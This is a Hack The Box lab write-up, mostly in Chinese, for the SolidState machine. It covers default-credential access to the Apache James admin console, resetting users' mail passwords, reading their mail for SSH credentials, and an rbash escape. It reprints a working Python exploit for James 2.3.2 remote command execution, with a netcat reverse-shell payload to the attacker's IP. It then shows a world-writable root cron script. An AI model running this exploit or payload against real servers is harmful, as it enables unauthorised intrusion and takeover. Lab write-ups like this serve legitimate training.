HTB SolidState writeup
大佬请忽略!
SolidState攻击要点:
★ James Mail Server 信息收集
★ 定时任务提权
信息收集
nmap
└─$ nmap -p- -sCV --min-rate 1000 10.10.10.51
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-26 20:59 CST
Nmap scan report for 10.10.10.51
Host is up (0.21s latency).
Not shown: 65529 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey:
| 2048 77:00:84:f5:78:b9:c7:d3:54:cf:71:2e:0d:52:6d:8b (RSA)
| 256 78:b8:3a:f6:60:19:06:91:f5:53:92:1d:3f:48:ed:53 (ECDSA)
|_ 256 e4:45:e9:ed:07:4d:73:69:43:5a:12:70:9d:c4:af:76 (ED25519)
25/tcp open smtp JAMES smtpd 2.3.2
|_smtp-commands: solidstate Hello nmap.scanme.org (10.10.16.14 [10.10.16.14])
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-title: Home - Solid State Security
|_http-server-header: Apache/2.4.25 (Debian)
110/tcp open pop3 JAMES pop3d 2.3.2
119/tcp open nntp JAMES nntpd (posting ok)
4555/tcp open james-admin JAMES Remote Admin 2.3.2
Service Info: Host: solidstate; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 183.74 seconds靶机开放ssh服务22端口,JAMES服务的25(smtp)、110(POP3)、119(NNTP)、4555(James admin)端口和HTTP服务的80端口,操作系统Debian。
http
gobuster
目录与文件收集
└─$ gobuster dir -u http://10.10.10.51/ -t 100 -o gobuster.log --no-error -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x txt,html
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.51/
[+] Method: GET
[+] Threads: 100
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: txt,html
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/images (Status: 301) [Size: 311] [--> http://10.10.10.51/images/]
/.html (Status: 403) [Size: 291]
/index.html (Status: 200) [Size: 7776]
/about.html (Status: 200) [Size: 7183]
/services.html (Status: 200) [Size: 8404]
/assets (Status: 301) [Size: 311] [--> http://10.10.10.51/assets/]
/README.txt (Status: 200) [Size: 963]
/LICENSE.txt (Status: 200) [Size: 17128]
/.html (Status: 403) [Size: 291]
/server-status (Status: 403) [Size: 299]
Progress: 661677 / 661680 (100.00%)
===============================================================
Finished
===============================================================没有什么可利用信息。
James Mail Server - TCP 25/110/119/4555
James Mail Server is listening on four ports with different functions. Simple Mail Transfer Protocol (SMTP) on TCP 25, Post Office Protocol (POP3) on TCP 110, and Network News Transfer Protocol (NNTP) on TCP 119 are all services that this box is offering. I could look at potentially brute forcing valid user names or sending phishing emails, but first I want to look at port 4555.
TCP port 4555 is interesting because it is the James administration port. Even without an exploit, if I can access this service, I can likely get into things that might be useful. That said, I'll first check searchsploit. nmap identified this as version 2.3.2, and there's a match on an RCE exploit:
Shell as mindy
james server default credentials is root/root
James使用。
telnet localhost 4555
JAMES Remote Administration Tool 2.3.1
Login id:root
Password:root
Welcome root.
HELP...
quit
Bye
使用默认口令登录JAMES Remote Manager,发现james、thomas、john、mindy、mailadmin5个用户。
└─$ telnet 10.10.10.51 4555
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
JAMES Remote Administration Tool 2.3.2
Please enter your login and password
Login id:
root
Password:
root
Welcome root. HELP for a list of commands
listusers
Existing accounts 6
user: james
user: thomas
user: john
user: mindy
user: mailadmin修改以上5个用户的密码登录他们的邮箱,检查是否存在有价值信息。
修改用户密码
setpassword james james
Password for james reset
setpassword thomas thomas
Password for thomas reset
setpassword john john
Password for john reset
setpassword mindy mindy
Password for mindy reset
setpassword mailadmin mailadmin
Password for mailadmin resetPOP syntax
POP commands:
USER uid Log in as "uid"
PASS password Substitue "password" for your actual password
STAT List number of messages, total mailbox size
LIST List messages and sizes
RETR n Show message n
DELE n Mark message n for deletion
RSET Undo any changes
QUIT Logout (expunges messages if no RSET)
TOP msg n Show first n lines of message number msg
CAPA Get capabilitiesExample:
root@kali:~# telnet $ip 110
+OK beta POP3 server (JAMES POP3 Server 2.3.2) ready
USER billydean
+OK
PASS password
+OK Welcome billydean
list
+OK 2 1807
1 786
2 1021
retr 1
+OK Message follows
From: jamesbrown@motown.com
Dear Billy Dean,
Here is your login for remote desktop ... try not to forget it this time!
username: billydean
password: PA$$W0RD!Z收集用户信息
James
└─$ telnet 10.10.10.51 110
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready
USER james
+OK
pass james
+OK Welcome james
LIST
+OK 0 0
.
Connection closed by foreign host.Thomas
└─$ telnet 10.10.10.51 110
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready
user thomas
+OK
pass thomas
+OK Welcome thomas
list
+OK 0 0
.
Connection closed by foreign host.John
└─$ telnet 10.10.10.51 110
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready
user john
+OK
pass john
+OK Welcome john
list
+OK 1 743
1 743
.
retr 1
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <9564574.1.1503422198108.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: john@localhost
Received: from 192.168.11.142 ([192.168.11.142])
by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
for <john@localhost>;
Tue, 22 Aug 2017 13:16:20 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:16:20 -0400 (EDT)
From: mailadmin@localhost
Subject: New Hires access
John,
Can you please restrict mindy's access until she gets read on to the program. Also make sure that you send her a tempory password to login to her accounts.
Thank you in advance.
Respectfully,
James
.
quit
+OK Apache James POP3 Server signing off.
Connection closed by foreign host.mindy
└─$ telnet 10.10.10.51 110
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready
user mindy
+OK
pass mindy
+OK Welcome mindy
list
+OK 2 1945
1 1109
2 836
.
retr 1
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <5420213.0.1503422039826.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: mindy@localhost
Received: from 192.168.11.142 ([192.168.11.142])
by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 798
for <mindy@localhost>;
Tue, 22 Aug 2017 13:13:42 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:13:42 -0400 (EDT)
From: mailadmin@localhost
Subject: Welcome
Dear Mindy,
Welcome to Solid State Security Cyber team! We are delighted you are joining us as a junior defense analyst. Your role is critical in fulfilling the mission of our orginzation. The enclosed information is designed to serve as an introduction to Cyber Security and provide resources that will help you make a smooth transition into your new role. The Cyber team is here to support your transition so, please know that you can call on any of us to assist you.
We are looking forward to you joining our team and your success at Solid State Security.
Respectfully,
James
.
retr 2
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <16744123.2.1503422270399.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: mindy@localhost
Received: from 192.168.11.142 ([192.168.11.142])
by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
for <mindy@localhost>;
Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
From: mailadmin@localhost
Subject: Your Access
Dear Mindy,
Here are your ssh credentials to access the system. Remember to reset your password after your first login.
Your access is restricted at the moment, feel free to ask your supervisor to add any commands you need to your path.
username: mindy
pass: P@55W0rd1!2@
Respectfully,
James
.
Connection closed by foreign host.用户名密码mindy/P@55W0rd1!2@
mailadmin
└─$ telnet 10.10.10.51 110
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready
user mailadmin
+OK
pass mailadmin
+OK Welcome mailadmin
list
+OK 0 0
.
quit
+OK Apache James POP3 Server signing off.
Connection closed by foreign host.shell
└─$ ssh mindy@10.10.10.51
The authenticity of host '10.10.10.51 (10.10.10.51)' can't be established.
ED25519 key fingerprint is SHA256:rC5LxqIPhybBFae7BXE/MWyG4ylXjaZJn6z2/1+GmJg.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.51' (ED25519) to the list of known hosts.
mindy@10.10.10.51's password:
Linux solidstate 4.9.0-3-686-pae #1 SMP Debian 4.9.30-2+deb9u3 (2017-08-06) i686
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Aug 22 14:00:02 2017 from 192.168.11.142
mindy@solidstate:~$ id
-rbash: id: command not foundbreakout of rbash
└─$ ssh mindy@10.10.10.51 -t bash
mindy@10.10.10.51's password:
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ id
uid=1001(mindy) gid=1001(mindy) groups=1001(mindy)Intended Path
James 2.3.2 exploit
原理:在James创建一个用户,在服务端会以用户名创建一个文件夹。把接收到的邮件存储到该文件夹。但是服务端并没有对用户名进行校验。当创建形如".../.../.../.../.../.../test"用户名会在根目录创建/test的文件夹并把收到的邮件存到里面。
/etc/bash_completion.d
/etc/bash_completion.d 是 Linux 中存储 Bash 命令补全脚本的系统目录,用于定义命令的自动补全行为。在 SSH 登录时,会加载这些脚本(通过 /etc/bash_completion)并 触发补全时运行相关函数。
通过写入/etc/bash_completion.d,当任何用户ssh登录时触发写入的反弹shell。
└─$ cat 35513.py
#!/usr/bin/python
#
# Exploit Title: Apache James Server 2.3.2 Authenticated User Remote Command Execution
# Date: 16\10\2014
# Exploit Author: Jakub Palaczynski, Marcin Woloszyn, Maciej Grabiec
# Vendor Homepage: http://james.apache.org/server/
# Software Link: http://ftp.ps.pl/pub/apache/james/server/apache-james-2.3.2.zip
# Version: Apache James Server 2.3.2
# Tested on: Ubuntu, Debian
# Info: This exploit works on default installation of Apache James Server 2.3.2
# Info: Example paths that will automatically execute payload on some action: /etc/bash_completion.d , /etc/pm/config.d
import socket
import sys
import time
# specify payload
#payload = 'touch /tmp/proof.txt' # to exploit on any user
payload = '/bin/nc -c bash 10.10.16.14 443' # to exploit only on root
# credentials to James Remote Administration Tool (Default - root/root)
user = 'root'
pwd = 'root'
if len(sys.argv) != 2:
sys.stderr.write("[-]Usage: python %s <ip>\n" % sys.argv[0])
sys.stderr.write("[-]Exemple: python %s 127.0.0.1\n" % sys.argv[0])
sys.exit(1)
ip = sys.argv[1]
def recv(s):
s.recv(1024)
time.sleep(0.2)
try:
print "[+]Connecting to James Remote Administration Tool..."
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((ip,4555))
s.recv(1024)
s.send(user + "\n")
s.recv(1024)
s.send(pwd + "\n")
s.recv(1024)
print "[+]Creating user..."
s.send("adduser ../../../../../../../../etc/bash_completion.d exploit\n")
s.recv(1024)
s.send("quit\n")
s.close()
print "[+]Connecting to James SMTP server..."
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((ip,25))
s.send("ehlo team@team.pl\r\n")
recv(s)
print "[+]Sending payload..."
s.send("mail from: <'@team.pl>\r\n")
recv(s)
# also try s.send("rcpt to: <../../../../../../../../etc/bash_completion.d@hostname>\r\n") if the recipient cannot be found
s.send("rcpt to: <../../../../../../../../etc/bash_completion.d>\r\n")
recv(s)
s.send("data\r\n")
recv(s)
s.send("From: team@team.pl\r\n")
s.send("\r\n")
s.send("'\n")
s.send(payload + "\n")
s.send("\r\n.\r\n")
recv(s)
s.send("quit\r\n")
recv(s)
s.close()
print "[+]Done! Payload will be executed once somebody logs in."
except:
print "Connection failed."fire
└─$ python2 35513.py 10.10.10.51
[+]Connecting to James Remote Administration Tool...
[+]Creating user...
[+]Connecting to James SMTP server...
[+]Sending payload...
[+]Done! Payload will be executed once somebody logs in.
└─$ ssh mindy@10.10.10.51
mindy@10.10.10.51's password:
Linux solidstate 4.9.0-3-686-pae #1 SMP Debian 4.9.30-2+deb9u3 (2017-08-06) i686
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon Oct 27 02:46:34 2025 from 10.10.16.14
-rbash: $'\254\355\005sr\036org.apache.james.core.MailImpl\304x\r\345\274\317ݬ\003': command not found
-rbash: L: command not found
-rbash: attributestLjava/util/HashMap: No such file or directory
-rbash: L
errorMessagetLjava/lang/String: No such file or directory
-rbash: L
lastUpdatedtLjava/util/Date: No such file or directory
-rbash: Lmessaget!Ljavax/mail/internet/MimeMessage: No such file or directory
-rbash: $'L\004nameq~\002L': command not found
-rbash: recipientstLjava/util/Collection: No such file or directory
-rbash: L: command not found
-rbash: $'remoteAddrq~\002L': command not found
-rbash: remoteHostq~LsendertLorg/apache/mailet/MailAddress: No such file or directory
-rbash: $'L\005stateq~\002xpsr\035org.apache.mailet.MailAddress': command not found
-rbash: $'\221\222\204m\307{\244\002\003I\003posL\004hostq~\002L\004userq~\002xp': command not found
-rbash: @team.pl>
Message-ID: <5970655.0.1761528882207.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: ../../../../../../../../etc/bash_completion.d@localhost
Received: from 10.10.16.14 ([10.10.16.14])
by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 505
for <../../../../../../../../etc/bash_completion.d@localhost>;
Sun, 26 Oct 2025 21:34:02 -0400 (EDT)
Date: Sun, 26 Oct 2025 21:34:02 -0400 (EDT)
From: team@team.pl
: No such file or directory
-rbash: connect: Connection refused
-rbash: /dev/tcp/10.10.16.14/9000: Connection refused
-rbash: $'\r': command not found
-rbash: $'\254\355\005sr\036org.apache.james.core.MailImpl\304x\r\345\274\317ݬ\003': command not found
-rbash: L: command not found
-rbash: attributestLjava/util/HashMap: No such file or directory
-rbash: L
errorMessagetLjava/lang/String: No such file or directory
-rbash: L
lastUpdatedtLjava/util/Date: No such file or directory
-rbash: Lmessaget!Ljavax/mail/internet/MimeMessage: No such file or directory
-rbash: $'L\004nameq~\002L': command not found
-rbash: recipientstLjava/util/Collection: No such file or directory
-rbash: L: command not found
-rbash: $'remoteAddrq~\002L': command not found
-rbash: remoteHostq~LsendertLorg/apache/mailet/MailAddress: No such file or directory
-rbash: $'L\005stateq~\002xpsr\035org.apache.mailet.MailAddress': command not found
-rbash: $'\221\222\204m\307{\244\002\003I\003posL\004hostq~\002L\004userq~\002xp': command not found
-rbash: @team.pl>
Message-ID: <11430700.1.1761546242958.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: ../../../../../../../../etc/bash_completion.d@localhost
Received: from 10.10.16.14 ([10.10.16.14])
by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 496
for <../../../../../../../../etc/bash_completion.d@localhost>;
Mon, 27 Oct 2025 02:23:22 -0400 (EDT)
Date: Mon, 27 Oct 2025 02:23:22 -0400 (EDT)
From: team@team.pl
: No such file or directory
(UNKNOWN) [10.10.16.14] 9002 (?) : Connection refused
-rbash: $'\r': command not found
-rbash: $'\254\355\005sr\036org.apache.james.core.MailImpl\304x\r\345\274\317ݬ\003': command not found
-rbash: L: command not found
-rbash: attributestLjava/util/HashMap: No such file or directory
-rbash: L
errorMessagetLjava/lang/String: No such file or directory
-rbash: L
lastUpdatedtLjava/util/Date: No such file or directory
-rbash: Lmessaget!Ljavax/mail/internet/MimeMessage: No such file or directory
-rbash: $'L\004nameq~\002L': command not found
-rbash: recipientstLjava/util/Collection: No such file or directory
-rbash: L: command not found
-rbash: $'remoteAddrq~\002L': command not found
-rbash: remoteHostq~LsendertLorg/apache/mailet/MailAddress: No such file or directory
-rbash: $'L\005stateq~\002xpsr\035org.apache.mailet.MailAddress': command not found
-rbash: $'\221\222\204m\307{\244\002\003I\003posL\004hostq~\002L\004userq~\002xp': command not found
-rbash: @team.pl>
Message-ID: <25509615.2.1761546611836.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: ../../../../../../../../etc/bash_completion.d@localhost
Received: from 10.10.16.14 ([10.10.16.14])
by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 385
for <../../../../../../../../etc/bash_completion.d@localhost>;
Mon, 27 Oct 2025 02:29:31 -0400 (EDT)
Date: Mon, 27 Oct 2025 02:29:31 -0400 (EDT)
From: team@team.pl
: No such file or directory
(UNKNOWN) [10.10.16.14] 9002 (?) : Connection refused
-rbash: $'\r': command not found
-rbash: $'\254\355\005sr\036org.apache.james.core.MailImpl\304x\r\345\274\317ݬ\003': command not found
-rbash: L: command not found
-rbash: attributestLjava/util/HashMap: No such file or directory
-rbash: L
errorMessagetLjava/lang/String: No such file or directory
-rbash: L
lastUpdatedtLjava/util/Date: No such file or directory
-rbash: Lmessaget!Ljavax/mail/internet/MimeMessage: No such file or directory
-rbash: $'L\004nameq~\002L': command not found
-rbash: recipientstLjava/util/Collection: No such file or directory
-rbash: L: command not found
-rbash: $'remoteAddrq~\002L': command not found
-rbash: remoteHostq~LsendertLorg/apache/mailet/MailAddress: No such file or directory
-rbash: $'L\005stateq~\002xpsr\035org.apache.mailet.MailAddress': command not found
-rbash: $'\221\222\204m\307{\244\002\003I\003posL\004hostq~\002L\004userq~\002xp': command not found
-rbash: @team.pl>
Message-ID: <25588697.3.1761546839503.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: ../../../../../../../../etc/bash_completion.d@localhost
Received: from 10.10.16.14 ([10.10.16.14])
by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 747
for <../../../../../../../../etc/bash_completion.d@localhost>;
Mon, 27 Oct 2025 02:33:19 -0400 (EDT)
Date: Mon, 27 Oct 2025 02:33:19 -0400 (EDT)
From: team@team.pl
: No such file or directory
(UNKNOWN) [10.10.16.14] 9002 (?) : Connection refused
-rbash: $'\r': command not found
-rbash: $'\254\355\005sr\036org.apache.james.core.MailImpl\304x\r\345\274\317ݬ\003': command not found
-rbash: L: command not found
-rbash: attributestLjava/util/HashMap: No such file or directory
-rbash: L
errorMessagetLjava/lang/String: No such file or directory
-rbash: L
lastUpdatedtLjava/util/Date: No such file or directory
-rbash: Lmessaget!Ljavax/mail/internet/MimeMessage: No such file or directory
-rbash: $'L\004nameq~\002L': command not found
-rbash: recipientstLjava/util/Collection: No such file or directory
-rbash: L: command not found
-rbash: $'remoteAddrq~\002L': command not found
-rbash: remoteHostq~LsendertLorg/apache/mailet/MailAddress: No such file or directory
-rbash: $'L\005stateq~\002xpsr\035org.apache.mailet.MailAddress': command not found
-rbash: $'\221\222\204m\307{\244\002\003I\003posL\004hostq~\002L\004userq~\002xp': command not found
-rbash: @team.pl>
Message-ID: <8441270.4.1761547157536.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: ../../../../../../../../etc/bash_completion.d@localhost
Received: from 10.10.16.14 ([10.10.16.14])
by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 658
for <../../../../../../../../etc/bash_completion.d@localhost>;
Mon, 27 Oct 2025 02:38:37 -0400 (EDT)
Date: Mon, 27 Oct 2025 02:38:37 -0400 (EDT)
From: team@team.pl
: No such file or directory
└─$ nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.16.14] from (UNKNOWN) [10.10.10.51] 60888
id
uid=1001(mindy) gid=1001(mindy) groups=1001(mindy)shell as root
在/opt文件夹下发现tmp.py脚本并且其他组具有读写执行权限。
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ cd /opt/
${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ ls -la
total 16
drwxr-xr-x 3 root root 4096 Aug 22 2017 .
drwxr-xr-x 22 root root 4096 May 27 2022 ..
drwxr-xr-x 11 root root 4096 Apr 26 2021 james-2.3.2
-rwxrwxrwx 1 root root 122 Oct 26 21:49 tmp.py
${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt/james-2.3.2/conf$ uname -a
Linux solidstate 4.9.0-3-686-pae #1 SMP Debian 4.9.30-2+deb9u3 (2017-08-06) i686 GNU/Linux上传pspy32到靶机运行获取系统运行的进程信息,发现tmp.py每3分钟被root账号调用一次。
pspy32
pspy32 是一款功能强大且轻量的进程监控工具,基于 /proc 文件系统实现无特权监控,适合渗透测试中的信息收集和提权场景。其主要用途包括发现可利用的 cron 任务、不安全的进程执行和文件系统事件。通过分析 pspy 的输出,攻击者可以找到系统配置漏洞(如可写脚本或不安全的挂载点),从而实现提权或持久化攻击。防御方面,管理员应定期审计 cron 任务、检查脚本权限并限制 /proc 访问,以降低被 pspy32 利用的风险。
${debian_chroot:+($debian_chroot)}mindy@solidstate:/dev/shm$ wget http://10.10.16.14/pspy32
--2025-10-26 21:31:43-- http://10.10.16.14/pspy32
Connecting to 10.10.16.14:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2940928 (2.8M) [application/octet-stream]
Saving to: 'pspy32'
pspy32 100%[====================================================>] 2.80M 538KB/s in 8.1s
2025-10-26 21:31:51 (353 KB/s) - 'pspy32' saved [2940928/2940928]
${debian_chroot:+($debian_chroot)}mindy@solidstate:/dev/shm$ chmod +x pspy32
${debian_chroot:+($debian_chroot)}mindy@solidstate:/dev/shm$ ./pspy32
pspy - version: v1.2.1 - Commit SHA: f9e6a1590a4312b9faa093d8dc84e19567977a6d
██▓███ ██████ ██▓███ ▓██ ██▓
▓██░ ██▒▒██ ▒ ▓██░ ██▒▒██ ██▒
▓██░ ██▓▒░ ▓██▄ ▓██░ ██▓▒ ▒██ ██░
▒██▄█▓▒ ▒ ▒ ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
▒██▒ ░ ░▒██████▒▒▒██▒ ░ ░ ░ ██▒▓░
▒▓▒░ ░ ░▒ ▒▓▒ ▒ ░▒▓▒░ ░ ░ ██▒▒▒
░▒ ░ ░ ░▒ ░ ░░▒ ░ ▓██ ░▒░
░░ ░ ░ ░ ░░ ▒ ▒ ░░
░ ░ ░
░ ░
Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scanning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2025/10/26 21:32:04 CMD: UID=1001 PID=1496 | ./pspy32
2025/10/26 21:32:04 CMD: UID=0 PID=1469 |
2025/10/26 21:32:04 CMD: UID=1001 PID=1439 | bash
2025/10/26 21:32:04 CMD: UID=1001 PID=1438 | sh
2025/10/26 21:32:04 CMD: UID=1001 PID=1437 | sshd: mindy@pts/1
2025/10/26 21:32:04 CMD: UID=0 PID=1431 | sshd: mindy [priv]
2025/10/26 21:32:04 CMD: UID=0 PID=1430 |
2025/10/26 21:32:04 CMD: UID=0 PID=1415 |
2025/10/26 21:32:04 CMD: UID=1001 PID=1393 | -rbash
2025/10/26 21:32:04 CMD: UID=1001 PID=1392 | sshd: mindy@pts/0
2025/10/26 21:32:04 CMD: UID=1001 PID=1384 | (sd-pam)
2025/10/26 21:32:04 CMD: UID=1001 PID=1383 | /lib/systemd/systemd --user
2025/10/26 21:32:04 CMD: UID=0 PID=1381 | sshd: mindy [priv]
2025/10/26 21:32:04 CMD: UID=33 PID=1300 | /usr/sbin/apache2 -k start
2025/10/26 21:32:04 CMD: UID=0 PID=1251 | /usr/sbin/cups-browsed
2025/10/26 21:32:04 CMD: UID=0 PID=1249 | /usr/sbin/cupsd -l
2025/10/26 21:32:04 CMD: UID=33 PID=1037 | /usr/sbin/apache2 -k start
2025/10/26 21:32:04 CMD: UID=33 PID=982 | /usr/sbin/apache2 -k start
2025/10/26 21:32:04 CMD: UID=0 PID=944 | /usr/sbin/apache2 -k start
2025/10/26 21:32:04 CMD: UID=111 PID=920 | /usr/lib/colord/colord
2025/10/26 21:32:04 CMD: UID=116 PID=905 | /usr/lib/gnome-settings-daemon/gnome-settings-daemon
2025/10/26 21:32:04 CMD: UID=0 PID=904 | /usr/lib/packagekit/packagekitd
2025/10/26 21:32:04 CMD: UID=0 PID=903 | /sbin/wpa_supplicant -u -s -O /run/wpa_supplicant
2025/10/26 21:32:04 CMD: UID=116 PID=889 | /usr/bin/pulseaudio --daemonize=no
2025/10/26 21:32:04 CMD: UID=116 PID=886 | /usr/lib/at-spi2-core/at-spi2-registryd --use-gnome-session
2025/10/26 21:32:04 CMD: UID=116 PID=884 | /usr/bin/dbus-daemon --config-file=/usr/share/defaults/at-spi2/accessibility.conf --nofork --print-address 3
2025/10/26 21:32:04 CMD: UID=116 PID=870 | /usr/lib/at-spi2-core/at-spi-bus-launcher
2025/10/26 21:32:04 CMD: UID=116 PID=797 | /usr/bin/Xwayland :1024 -rootless -noreset -listen 4 -listen 5 -displayfd 6
2025/10/26 21:32:04 CMD: UID=0 PID=780 | /usr/lib/upower/upowerd
2025/10/26 21:32:04 CMD: UID=116 PID=775 | /usr/bin/gnome-shell
2025/10/26 21:32:04 CMD: UID=116 PID=758 | /usr/lib/gnome-session/gnome-session-binary --autostart /usr/share/gdm/greeter/autostart
2025/10/26 21:32:04 CMD: UID=116 PID=755 | /usr/bin/dbus-daemon --session --address=systemd: --nofork --nopidfile --systemd-activation
2025/10/26 21:32:04 CMD: UID=116 PID=748 | /usr/lib/gdm3/gdm-wayland-session gnome-session --autostart /usr/share/gdm/greeter/autostart
2025/10/26 21:32:04 CMD: UID=116 PID=743 | (sd-pam)
2025/10/26 21:32:04 CMD: UID=116 PID=742 | /lib/systemd/systemd --user
2025/10/26 21:32:04 CMD: UID=0 PID=738 | gdm-session-worker [pam/gdm-launch-environment]
2025/10/26 21:32:04 CMD: UID=0 PID=731 | /usr/sbin/gdm3
2025/10/26 21:32:04 CMD: UID=0 PID=714 | /usr/sbin/minissdpd -i 0.0.0.0
2025/10/26 21:32:04 CMD: UID=0 PID=711 | /usr/sbin/sshd -D
2025/10/26 21:32:04 CMD: UID=0 PID=544 | /usr/lib/jvm/java-8-openjdk-i386//bin/java -Djava.ext.dirs=/opt/james-2.3.2/lib:/opt/james-2.3.2/tools/lib -Djava.security.manager -Djava.security.policy=jar:file:/opt/james-2.3.2/bin/phoenix-loader.jar!/META-INF/java.policy -Dnetworkaddress.cache.ttl=300 -Dphoenix.home=/opt/james-2.3.2 -Djava.io.tmpdir=/opt/james-2.3.2/temp -jar /opt/james-2.3.2/bin/phoenix-loader.jar
2025/10/26 21:32:04 CMD: UID=110 PID=539 | avahi-daemon: chroot helper
2025/10/26 21:32:04 CMD: UID=0 PID=534 | /usr/lib/policykit-1/polkitd --no-debug
2025/10/26 21:32:04 CMD: UID=0 PID=529 | /bin/sh /opt/james-2.3.2/bin/run.sh
2025/10/26 21:32:04 CMD: UID=0 PID=527 | /usr/bin/VGAuthService
2025/10/26 21:32:04 CMD: UID=110 PID=525 | avahi-daemon: running [solidstate.local]
2025/10/26 21:32:04 CMD: UID=0 PID=524 | /usr/sbin/NetworkManager --no-daemon
2025/10/26 21:32:04 CMD: UID=0 PID=523 | /usr/sbin/ModemManager
2025/10/26 21:32:04 CMD: UID=0 PID=522 | /lib/systemd/systemd-logind
2025/10/26 21:32:04 CMD: UID=108 PID=510 | /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation
2025/10/26 21:32:04 CMD: UID=0 PID=508 | /usr/sbin/rsyslogd -n
2025/10/26 21:32:04 CMD: UID=0 PID=507 | /usr/sbin/cron -f
2025/10/26 21:32:04 CMD: UID=106 PID=506 | /usr/lib/rtkit/rtkit-daemon
2025/10/26 21:32:04 CMD: UID=0 PID=504 | /usr/lib/accountsservice/accounts-daemon
2025/10/26 21:32:04 CMD: UID=0 PID=414 |
2025/10/26 21:32:04 CMD: UID=0 PID=400 |
2025/10/26 21:32:04 CMD: UID=100 PID=395 | /lib/systemd/systemd-timesyncd
2025/10/26 21:32:04 CMD: UID=0 PID=362 | /lib/systemd/systemd-udevd
2025/10/26 21:32:04 CMD: UID=0 PID=326 | /lib/systemd/systemd-journald
2025/10/26 21:32:04 CMD: UID=0 PID=324 |
2025/10/26 21:32:04 CMD: UID=0 PID=323 | /usr/bin/vmtoolsd
...[snip]...
2025/10/26 21:32:04 CMD: UID=0 PID=2 |
2025/10/26 21:32:04 CMD: UID=0 PID=1 | /sbin/init
2025/10/26 21:33:01 CMD: UID=0 PID=1505 | /usr/sbin/CRON -f
2025/10/26 21:33:01 CMD: UID=0 PID=1506 | /usr/sbin/CRON -f
2025/10/26 21:33:01 CMD: UID=0 PID=1507 | /bin/sh -c python /opt/tmp.py
